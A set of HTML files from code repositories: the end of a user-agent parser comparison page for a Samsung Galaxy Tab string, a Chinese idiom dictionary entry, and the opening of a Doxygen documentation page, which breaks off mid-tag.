Chrome/18.0.1025.133 Safari/535.19 ) ) [device] => Sinergi\BrowserDetector\Device Object ( [name:Sinergi\BrowserDetector\Device:private] => unknown [userAgent:Sinergi\BrowserDetector\Device:private] => Sinergi\BrowserDetector\UserAgent Object ( [userAgentString:Sinergi\BrowserDetector\UserAgent:private] => Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Safari/535.19 ) ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UAParser<br /><small>v3.4.5</small><br /></td><td>Chrome 18.0.1025</td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Samsung</td><td>GT-P5100</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-3160e405-8a8f-46dd-8f47-5115f06462d2">Detail</a> <!-- Modal Structure --> <div id="modal-3160e405-8a8f-46dd-8f47-5115f06462d2" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UAParser result detail</h4> <p><pre><code class="php">UAParser\Result\Client Object ( [ua] => UAParser\Result\UserAgent Object ( [major] => 18 [minor] => 0 [patch] => 1025 [family] => Chrome ) [os] => UAParser\Result\OperatingSystem Object ( [major] => 4 [minor] => 0 [patch] => 3 [patchMinor] => [family] => Android ) [device] => UAParser\Result\Device Object ( [brand] => Samsung [model] => GT-P5100 [family] => Samsung GT-P5100 ) [originalUserAgent] => Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Safari/535.19 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UserAgentApiCom<br /><small></small><br /></td><td>Chrome 18.0.1025.133</td><td>WebKit 535.19</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>Mobile</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.15101</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-afeb05fb-26b9-4509-b8ac-0c604a9e97d6">Detail</a> <!-- Modal Structure --> <div id="modal-afeb05fb-26b9-4509-b8ac-0c604a9e97d6" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UserAgentApiCom result detail</h4> <p><pre><code class="php">stdClass Object ( [platform_name] => Android [platform_version] => 4.0.3 [platform_type] => Mobile [browser_name] => Chrome [browser_version] => 18.0.1025.133 [engine_name] => WebKit [engine_version] => 535.19 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UserAgentStringCom<br /><small></small><br /></td><td>Android Webkit Browser </td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.062</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-08a9ddfb-838f-48d7-9ede-1d132306b2ee">Detail</a> <!-- Modal Structure --> <div id="modal-08a9ddfb-838f-48d7-9ede-1d132306b2ee" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UserAgentStringCom result detail</h4> <p><pre><code class="php">stdClass Object ( [agent_type] => Browser [agent_name] => Android Webkit Browser [agent_version] => -- [os_type] => Android [os_name] => Android [os_versionName] => [os_versionNumber] => 4.0.3 [os_producer] => [os_producerURL] => [linux_distibution] => Null [agent_language] => [agent_languageTag] => ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>WhatIsMyBrowserCom<br /><small></small><br /></td><td>Chrome 18.0.1025.133</td><td>WebKit 535.19</td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Samsung</td><td></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.24001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-5fc1ff22-a74d-481b-9ad1-fcfde73ded9c">Detail</a> <!-- Modal Structure --> <div id="modal-5fc1ff22-a74d-481b-9ad1-fcfde73ded9c" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhatIsMyBrowserCom result detail</h4> <p><pre><code class="php">stdClass Object ( [operating_system_name] => Android [simple_sub_description_string] => [simple_browser_string] => Chrome 18 on Android (Ice Cream Sandwich) [browser_version] => 18 [extra_info] => Array ( ) [operating_platform] => [extra_info_table] => stdClass Object ( [System Build] => IML74K ) [layout_engine_name] => WebKit [detected_addons] => Array ( ) [operating_system_flavour_code] => [hardware_architecture] => [operating_system_flavour] => [operating_system_frameworks] => Array ( ) [browser_name_code] => chrome [operating_system_version] => Ice Cream Sandwich [simple_operating_platform_string] => Samsung GT-P5100 [is_abusive] => [layout_engine_version] => 535.19 [browser_capabilities] => Array ( ) [operating_platform_vendor_name] => Samsung [operating_system] => Android (Ice Cream Sandwich) [operating_system_version_full] => 4.0.3 [operating_platform_code] => GT-P5100 [browser_name] => Chrome [operating_system_name_code] => android [user_agent] => Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Safari/535.19 [browser_version_full] => 18.0.1025.133 [browser] => Chrome 18 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>WhichBrowser<br /><small>v2.0.18</small><br /></td><td>Chrome 18</td><td>Webkit 535.19</td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Samsung</td><td>Galaxy Tab 2 10.1</td><td>tablet</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-083a336f-5d73-4505-84f3-c5fc9bb78652">Detail</a> <!-- Modal Structure --> <div id="modal-083a336f-5d73-4505-84f3-c5fc9bb78652" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhichBrowser result detail</h4> <p><pre><code class="php">Array ( [browser] => Array ( [name] => Chrome [version] => 18 [type] => browser ) [engine] => Array ( [name] => Webkit [version] => 535.19 ) [os] => Array ( [name] => Android [version] => 4.0.3 ) [device] => Array ( [type] => tablet [manufacturer] => Samsung [model] => Galaxy Tab 2 10.1 ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Woothee<br /><small>v1.2.0</small><br /></td><td>Chrome 18.0.1025.133</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>smartphone</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-f00e7198-0e22-49fe-bad0-dbb3a9cde9b9">Detail</a> <!-- Modal Structure --> <div id="modal-f00e7198-0e22-49fe-bad0-dbb3a9cde9b9" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Woothee result detail</h4> <p><pre><code class="php">Array ( [name] => Chrome [vendor] => Google [version] => 18.0.1025.133 [category] => smartphone [os] => Android [os_version] => 4.0.3 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Wurfl<br /><small>1.7.1.0</small><br /></td><td>Chrome 18.0.1025.133</td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Samsung</td><td>GT-P5100</td><td>Tablet</td><td>yes</td><td>yes</td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.017</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-a2bedf8c-4a95-42a7-96c5-aaf233b2ac50">Detail</a> <!-- Modal Structure --> <div id="modal-a2bedf8c-4a95-42a7-96c5-aaf233b2ac50" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Wurfl result detail</h4> <p><pre><code class="php">Array ( [virtual] => Array ( [is_android] => true [is_ios] => false [is_windows_phone] => false [is_app] => false [is_full_desktop] => false [is_largescreen] => true [is_mobile] => true [is_robot] => false [is_smartphone] => false [is_touchscreen] => true [is_wml_preferred] => false [is_xhtmlmp_preferred] => false [is_html_preferred] => true [advertised_device_os] => Android [advertised_device_os_version] => 4.0.3 [advertised_browser] => Chrome [advertised_browser_version] => 18.0.1025.133 [complete_device_name] => Samsung GT-P5100 (Galaxy Tab 2 10.1) [device_name] => Samsung Galaxy Tab 2 10.1 [form_factor] => Tablet [is_phone] => false [is_app_webview] => false ) [all] => Array ( [brand_name] => Samsung [model_name] => GT-P5100 [unique] => true [ununiqueness_handler] => [is_wireless_device] => true [device_claims_web_support] => true [has_qwerty_keyboard] => true [can_skip_aligned_link_row] => true [uaprof] => http://wap.samsungmobile.com/uaprof/GT-P5100.xml [uaprof2] => [uaprof3] => [nokia_series] => 0 [nokia_edition] => 0 [device_os] => Android [mobile_browser] => Chrome Mobile [mobile_browser_version] => 18 [device_os_version] => 4.0 [pointing_method] => touchscreen [release_date] => 2012_april [marketing_name] => Galaxy Tab 2 10.1 [model_extra_info] => [nokia_feature_pack] => 0 [can_assign_phone_number] => true [is_tablet] => true [manufacturer_name] => [is_bot] => false [is_google_glass] => false [proportional_font] => false [built_in_back_button_support] => false [card_title_support] => true [softkey_support] => false [table_support] => true [numbered_menus] => false [menu_with_select_element_recommended] => false [menu_with_list_of_links_recommended] => true [icons_on_menu_items_support] => false [break_list_of_links_with_br_element_recommended] => true [access_key_support] => false [wrap_mode_support] => false [times_square_mode_support] => false [deck_prefetch_support] => false [elective_forms_recommended] => true [wizards_recommended] => false [image_as_link_support] => false [insert_br_element_after_widget_recommended] => false [wml_can_display_images_and_text_on_same_line] => false [wml_displays_image_in_center] => false [opwv_wml_extensions_support] => false [wml_make_phone_call_string] => wtai://wp/mc; [chtml_display_accesskey] => false [emoji] => false [chtml_can_display_images_and_text_on_same_line] => false [chtml_displays_image_in_center] => false [imode_region] => none [chtml_make_phone_call_string] => tel: [chtml_table_support] => false [xhtml_honors_bgcolor] => true [xhtml_supports_forms_in_table] => true [xhtml_support_wml2_namespace] => false [xhtml_autoexpand_select] => false [xhtml_select_as_dropdown] => false [xhtml_select_as_radiobutton] => false [xhtml_select_as_popup] => false [xhtml_display_accesskey] => false [xhtml_supports_invisible_text] => false [xhtml_supports_inline_input] => false [xhtml_supports_monospace_font] => false [xhtml_supports_table_for_layout] => true [xhtml_supports_css_cell_table_coloring] => true [xhtml_format_as_css_property] => false [xhtml_format_as_attribute] => false [xhtml_nowrap_mode] => false [xhtml_marquee_as_css_property] => false [xhtml_readable_background_color1] => #FFFFFF [xhtml_readable_background_color2] => #FFFFFF [xhtml_allows_disabled_form_elements] => true [xhtml_document_title_support] => true [xhtml_preferred_charset] => iso-8859-1 [opwv_xhtml_extensions_support] => false [xhtml_make_phone_call_string] => tel: [xhtmlmp_preferred_mime_type] => text/html [xhtml_table_support] => true [xhtml_send_sms_string] => sms: [xhtml_send_mms_string] => mms: [xhtml_file_upload] => supported [cookie_support] => true [accept_third_party_cookie] => true [xhtml_supports_iframe] => full [xhtml_avoid_accesskeys] => true [xhtml_can_embed_video] => none [ajax_support_javascript] => true [ajax_manipulate_css] => true [ajax_support_getelementbyid] => true [ajax_support_inner_html] => true [ajax_xhr_type] => standard [ajax_manipulate_dom] => true [ajax_support_events] => true [ajax_support_event_listener] => true [ajax_preferred_geoloc_api] => w3c_api [xhtml_support_level] => 4 [preferred_markup] => html_web_4_0 [wml_1_1] => false [wml_1_2] => false [wml_1_3] => false [html_wi_w3_xhtmlbasic] => true [html_wi_oma_xhtmlmp_1_0] => true [html_wi_imode_html_1] => false [html_wi_imode_html_2] => false [html_wi_imode_html_3] => false [html_wi_imode_html_4] => false [html_wi_imode_html_5] => false [html_wi_imode_htmlx_1] => false [html_wi_imode_htmlx_1_1] => false [html_wi_imode_compact_generic] => false [html_web_3_2] => true [html_web_4_0] => true [voicexml] => false [multipart_support] => false [total_cache_disable_support] => false [time_to_live_support] => false [resolution_width] => 1280 [resolution_height] => 800 [columns] => 25 [max_image_width] => 800 [max_image_height] => 1280 [rows] => 21 [physical_screen_width] => 218 [physical_screen_height] => 136 [dual_orientation] => true [density_class] => 1.0 [wbmp] => true [bmp] => false [epoc_bmp] => false [gif_animated] => false [jpg] => true [png] => true [tiff] => false [transparent_png_alpha] => true [transparent_png_index] => true [svgt_1_1] => true [svgt_1_1_plus] => false [greyscale] => false [gif] => true [colors] => 65536 [webp_lossy_support] => true [webp_lossless_support] => false [post_method_support] => true [basic_authentication_support] => true [empty_option_value_support] => true [emptyok] => false [nokia_voice_call] => false [wta_voice_call] => false [wta_phonebook] => false [wta_misc] => false [wta_pdc] => false [https_support] => true [phone_id_provided] => false [max_data_rate] => 3600 [wifi] => true [sdio] => false [vpn] => false [has_cellular_radio] => true [max_deck_size] => 2000000 [max_url_length_in_requests] => 256 [max_url_length_homepage] => 0 [max_url_length_bookmark] => 0 [max_url_length_cached_page] => 0 [max_no_of_connection_settings] => 0 [max_no_of_bookmarks] => 0 [max_length_of_username] => 0 [max_length_of_password] => 0 [max_object_size] => 0 [downloadfun_support] => false [directdownload_support] => true [inline_support] => false [oma_support] => true [ringtone] => false [ringtone_3gpp] => false [ringtone_midi_monophonic] => false [ringtone_midi_polyphonic] => false [ringtone_imelody] => false [ringtone_digiplug] => false [ringtone_compactmidi] => false [ringtone_mmf] => false [ringtone_rmf] => false [ringtone_xmf] => false [ringtone_amr] => false [ringtone_awb] => false [ringtone_aac] => false [ringtone_wav] => false [ringtone_mp3] => false [ringtone_spmidi] => false [ringtone_qcelp] => false [ringtone_voices] => 1 [ringtone_df_size_limit] => 0 [ringtone_directdownload_size_limit] => 0 [ringtone_inline_size_limit] => 0 [ringtone_oma_size_limit] => 0 [wallpaper] => false [wallpaper_max_width] => 0 [wallpaper_max_height] => 0 [wallpaper_preferred_width] => 0 [wallpaper_preferred_height] => 0 [wallpaper_resize] => none [wallpaper_wbmp] => false [wallpaper_bmp] => false [wallpaper_gif] => false [wallpaper_jpg] => false [wallpaper_png] => false [wallpaper_tiff] => false [wallpaper_greyscale] => false [wallpaper_colors] => 2 [wallpaper_df_size_limit] => 0 [wallpaper_directdownload_size_limit] => 0 [wallpaper_inline_size_limit] => 0 [wallpaper_oma_size_limit] => 0 [screensaver] => false [screensaver_max_width] => 0 [screensaver_max_height] => 0 [screensaver_preferred_width] => 0 [screensaver_preferred_height] => 0 [screensaver_resize] => none [screensaver_wbmp] => false [screensaver_bmp] => false [screensaver_gif] => false [screensaver_jpg] => false [screensaver_png] => false [screensaver_greyscale] => false [screensaver_colors] => 2 [screensaver_df_size_limit] => 0 [screensaver_directdownload_size_limit] => 0 [screensaver_inline_size_limit] => 0 [screensaver_oma_size_limit] => 0 [picture] => false [picture_max_width] => 0 [picture_max_height] => 0 [picture_preferred_width] => 0 [picture_preferred_height] => 0 [picture_resize] => none [picture_wbmp] => false [picture_bmp] => false [picture_gif] => false [picture_jpg] => false [picture_png] => false [picture_greyscale] => false [picture_colors] => 2 [picture_df_size_limit] => 0 [picture_directdownload_size_limit] => 0 [picture_inline_size_limit] => 0 [picture_oma_size_limit] => 0 [video] => false [oma_v_1_0_forwardlock] => false [oma_v_1_0_combined_delivery] => false [oma_v_1_0_separate_delivery] => false [streaming_video] => true [streaming_3gpp] => true [streaming_mp4] => true [streaming_mov] => false [streaming_video_size_limit] => 0 [streaming_real_media] => none [streaming_flv] => false [streaming_3g2] => false [streaming_vcodec_h263_0] => 30 [streaming_vcodec_h263_3] => -1 [streaming_vcodec_mpeg4_sp] => 0 [streaming_vcodec_mpeg4_asp] => -1 [streaming_vcodec_h264_bp] => 1 [streaming_acodec_amr] => nb [streaming_acodec_aac] => lc [streaming_wmv] => none [streaming_preferred_protocol] => rtsp [streaming_preferred_http_protocol] => apple_live_streaming [wap_push_support] => true [connectionless_service_indication] => false [connectionless_service_load] => false [connectionless_cache_operation] => false [connectionoriented_unconfirmed_service_indication] => false [connectionoriented_unconfirmed_service_load] => false [connectionoriented_unconfirmed_cache_operation] => false [connectionoriented_confirmed_service_indication] => false [connectionoriented_confirmed_service_load] => false [connectionoriented_confirmed_cache_operation] => false [utf8_support] => true [ascii_support] => false [iso8859_support] => false [expiration_date] => false [j2me_cldc_1_0] => false [j2me_cldc_1_1] => false [j2me_midp_1_0] => false [j2me_midp_2_0] => false [doja_1_0] => false [doja_1_5] => false [doja_2_0] => false [doja_2_1] => false [doja_2_2] => false [doja_3_0] => false [doja_3_5] => false [doja_4_0] => false [j2me_jtwi] => false [j2me_mmapi_1_0] => false [j2me_mmapi_1_1] => false [j2me_wmapi_1_0] => false [j2me_wmapi_1_1] => false [j2me_wmapi_2_0] => false [j2me_btapi] => false [j2me_3dapi] => false [j2me_locapi] => false [j2me_nokia_ui] => false [j2me_motorola_lwt] => false [j2me_siemens_color_game] => false [j2me_siemens_extension] => false [j2me_heap_size] => 0 [j2me_max_jar_size] => 0 [j2me_storage_size] => 0 [j2me_max_record_store_size] => 0 [j2me_screen_width] => 0 [j2me_screen_height] => 0 [j2me_canvas_width] => 0 [j2me_canvas_height] => 0 [j2me_bits_per_pixel] => 0 [j2me_audio_capture_enabled] => false [j2me_video_capture_enabled] => false [j2me_photo_capture_enabled] => false [j2me_capture_image_formats] => none [j2me_http] => false [j2me_https] => false [j2me_socket] => false [j2me_udp] => false [j2me_serial] => false [j2me_gif] => false [j2me_gif89a] => false [j2me_jpg] => false [j2me_png] => false [j2me_bmp] => false [j2me_bmp3] => false [j2me_wbmp] => false [j2me_midi] => false [j2me_wav] => false [j2me_amr] => false [j2me_mp3] => false [j2me_mp4] => false [j2me_imelody] => false [j2me_rmf] => false [j2me_au] => false [j2me_aac] => false [j2me_realaudio] => false [j2me_xmf] => false [j2me_wma] => false [j2me_3gpp] => false [j2me_h263] => false [j2me_svgt] => false [j2me_mpeg4] => false [j2me_realvideo] => false [j2me_real8] => false [j2me_realmedia] => false [j2me_left_softkey_code] => 0 [j2me_right_softkey_code] => 0 [j2me_middle_softkey_code] => 0 [j2me_select_key_code] => 0 [j2me_return_key_code] => 0 [j2me_clear_key_code] => 0 [j2me_datefield_no_accepts_null_date] => false [j2me_datefield_broken] => false [receiver] => true [sender] => true [mms_max_size] => 307200 [mms_max_height] => 480 [mms_max_width] => 640 [built_in_recorder] => false [built_in_camera] => true [mms_jpeg_baseline] => true [mms_jpeg_progressive] => false [mms_gif_static] => true [mms_gif_animated] => true [mms_png] => true [mms_bmp] => false [mms_wbmp] => true [mms_amr] => true [mms_wav] => false [mms_midi_monophonic] => true [mms_midi_polyphonic] => false [mms_midi_polyphonic_voices] => 0 [mms_spmidi] => false [mms_mmf] => false [mms_mp3] => true [mms_evrc] => false [mms_qcelp] => false [mms_ota_bitmap] => false [mms_nokia_wallpaper] => false [mms_nokia_operatorlogo] => false [mms_nokia_3dscreensaver] => false [mms_nokia_ringingtone] => false [mms_rmf] => false [mms_xmf] => false [mms_symbian_install] => false [mms_jar] => false [mms_jad] => false [mms_vcard] => true [mms_vcalendar] => true [mms_wml] => false [mms_wbxml] => false [mms_wmlc] => false [mms_video] => true [mms_mp4] => true [mms_3gpp] => true [mms_3gpp2] => true [mms_max_frame_rate] => 0 [nokiaring] => false [picturemessage] => false [operatorlogo] => false [largeoperatorlogo] => false [callericon] => false [nokiavcard] => false [nokiavcal] => false [sckl_ringtone] => false [sckl_operatorlogo] => false [sckl_groupgraphic] => false [sckl_vcard] => false [sckl_vcalendar] => false [text_imelody] => false [ems] => false [ems_variablesizedpictures] => false [ems_imelody] => false [ems_odi] => false [ems_upi] => false [ems_version] => 0 [siemens_ota] => false [siemens_logo_width] => 101 [siemens_logo_height] => 29 [siemens_screensaver_width] => 101 [siemens_screensaver_height] => 50 [gprtf] => false [sagem_v1] => false [sagem_v2] => false [panasonic] => false [sms_enabled] => true [wav] => false [mmf] => false [smf] => false [mld] => false [midi_monophonic] => true [midi_polyphonic] => true [sp_midi] => true [rmf] => false [xmf] => false [compactmidi] => false [digiplug] => false [nokia_ringtone] => false [imelody] => true [au] => false [amr] => true [awb] => false [aac] => true [mp3] => true [voices] => 1 [qcelp] => false [evrc] => false [flash_lite_version] => [fl_wallpaper] => false [fl_screensaver] => false [fl_standalone] => false [fl_browser] => false [fl_sub_lcd] => false [full_flash_support] => false [css_supports_width_as_percentage] => true [css_border_image] => webkit [css_rounded_corners] => webkit [css_gradient] => none [css_spriting] => true [css_gradient_linear] => none [is_transcoder] => false [transcoder_ua_header] => user-agent [rss_support] => false [pdf_support] => true [progressive_download] => true [playback_vcodec_h263_0] => 10 [playback_vcodec_h263_3] => -1 [playback_vcodec_mpeg4_sp] => 0 [playback_vcodec_mpeg4_asp] => -1 [playback_vcodec_h264_bp] => 3.0 [playback_real_media] => none [playback_3gpp] => true [playback_3g2] => false [playback_mp4] => true [playback_mov] => false [playback_acodec_amr] => nb [playback_acodec_aac] => none [playback_df_size_limit] => 0 [playback_directdownload_size_limit] => 0 [playback_inline_size_limit] => 0 [playback_oma_size_limit] => 0 [playback_acodec_qcelp] => false [playback_wmv] => none [hinted_progressive_download] => true [html_preferred_dtd] => html4 [viewport_supported] => true [viewport_width] => device_width_token [viewport_userscalable] => no [viewport_initial_scale] => [viewport_maximum_scale] => [viewport_minimum_scale] => [mobileoptimized] => false [handheldfriendly] => false [canvas_support] => full [image_inlining] => true [is_smarttv] => false [is_console] => false [nfc_support] => false [ux_full_desktop] => false [jqm_grade] => A [is_sencha_touch_ok] => false ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Zsxsoft<br /><small>1.3</small><br /></td><td>Google Chrome 18.0.1025.133</td><td><i class="material-icons">close</i></td><td>Android 4.0.3</td><td style="border-left: 1px solid #555">Samsung</td><td>P5100</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-5d43e024-b46c-44f6-8914-529b05569bc2">Detail</a> <!-- Modal Structure --> <div id="modal-5d43e024-b46c-44f6-8914-529b05569bc2" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Zsxsoft result detail</h4> <p><pre><code class="php">Array ( [browser] => Array ( [link] => http://google.com/chrome/ [title] => Google Chrome 18.0.1025.133 [name] => Google Chrome [version] => 18.0.1025.133 [code] => chrome [image] => img/16/browser/chrome.png ) [os] => Array ( [link] => http://www.android.com/ [name] => Android [version] => 4.0.3 [code] => android [x64] => [title] => Android 4.0.3 [type] => os [dir] => os [image] => img/16/os/android.png ) [device] => Array ( [link] => http://www.samsungmobile.com/ [title] => Samsung P5100 [model] => P5100 [brand] => Samsung [code] => samsung [dir] => device [type] => device [image] => img/16/device/samsung.png ) [platform] => Array ( [link] => http://www.samsungmobile.com/ [title] => Samsung P5100 [model] => P5100 [brand] => Samsung [code] => samsung [dir] => device [type] => device [image] => img/16/device/samsung.png ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr></table> </div> <div class="section"> <h1 class="header center orange-text">About this comparison</h1> <div class="row center"> <h5 class="header light"> The primary goal of this project is simple<br /> I wanted to know which user agent parser is the most accurate in each part - device detection, bot detection and so on...<br /> <br /> The secondary goal is to provide a source for all user agent parsers to improve their detection based on this results.<br /> <br /> You can also improve this further, by suggesting ideas at <a href="https://github.com/ThaDafinser/UserAgentParserComparison">ThaDafinser/UserAgentParserComparison</a><br /> <br /> The comparison is based on the abstraction by <a href="https://github.com/ThaDafinser/UserAgentParser">ThaDafinser/UserAgentParser</a> </h5> </div> </div> <div class="card"> <div class="card-content"> Comparison created <i>2016-05-10 08:10:14</i> | by <a href="https://github.com/ThaDafinser">ThaDafinser</a> </div> </div> </div> <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/js/materialize.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/list.js/1.2.0/list.min.js"></script> <script> $(document).ready(function(){ // the "href" attribute of .modal-trigger must specify the modal ID that wants to be triggered $('.modal-trigger').leanModal(); }); </script> </body> </html>
ThaDafinser/UserAgentParserComparison
v5/user-agent-detail/e9/3d/e93d87f0-5b6e-4fa9-8a69-d4eb386acf11.html
HTML
mit
57,360
<table width="90%" border="0"><tr><td><script>function openfile(url) {fullwin = window.open(url, "fulltext", "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,resizable=yes");}</script><div class="flayoutclass"><div class="flayoutclass_first"><table class="tableoutfmt2"><tr><th class="std1"><b>條目&nbsp;</b></th><td class="std2">挑脣料嘴</td></tr> <tr><th class="std1"><b>注音&nbsp;</b></th><td class="std2">ㄊ|ㄠ<sup class="subfont">ˇ</sup> ㄔㄨㄣ<sup class="subfont">ˊ</sup> ㄌ|ㄠ<sup class="subfont">ˋ</sup> ㄗㄨㄟ<sup class="subfont">ˇ</sup></td></tr> <tr><th class="std1"><b>漢語拼音&nbsp;</b></th><td class="std2"><font class="english_word">tiǎo chún liào zuǐ</font></td></tr> <tr><th class="std1"><b>釋義&nbsp;</b></th><td class="std2">料,撩撥。挑脣料嘴指口角爭論。元˙李致遠˙還牢末˙第一折:<img src=/cydic/dicword/fa40.gif border=0 alt=* class=fontimg valign=center>誰與你挑脣料嘴,辨別個誰是誰非。<img src=/cydic/dicword/fa41.gif border=0 alt=* class=fontimg valign=center>亦作<img src=/cydic/dicword/fa40.gif border=0 alt=* class=fontimg valign=center>挑牙料脣<img src=/cydic/dicword/fa41.gif border=0 alt=* class=fontimg valign=center>。</td></tr> <tr><th class="std1"><b><font class="fltypefont">附錄</font>&nbsp;</b></th><td class="std2">修訂本參考資料</td></tr> </td></tr></table></div> <!-- flayoutclass_first --><div class="flayoutclass_second"></div> <!-- flayoutclass_second --></div> <!-- flayoutclass --></td></tr></table>
BuzzAcademy/idioms-moe-unformatted-data
all-data/23000-23999/23323-22.html
HTML
mit
1,573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.8"/> <title>Apprecie: library/Model/ApprecieModelBase.php Source File</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="navtree.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="resize.js"></script> <script type="text/javascript" src="navtree.js"></script> <script type="text/javascript"> $(document).ready(initResizable); $(window).load(resizeHeight); </script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectlogo"><img alt="Logo" src="apprecie.jpg"/></td> <td style="padding-left: 0.5em;"> <div id="projectname">Apprecie &#160;<span id="projectnumber">1</span> </div> <div id="projectbrief">Azure PHP</div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.8 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li><a href="annotated.html"><span>Data&#160;Structures</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" 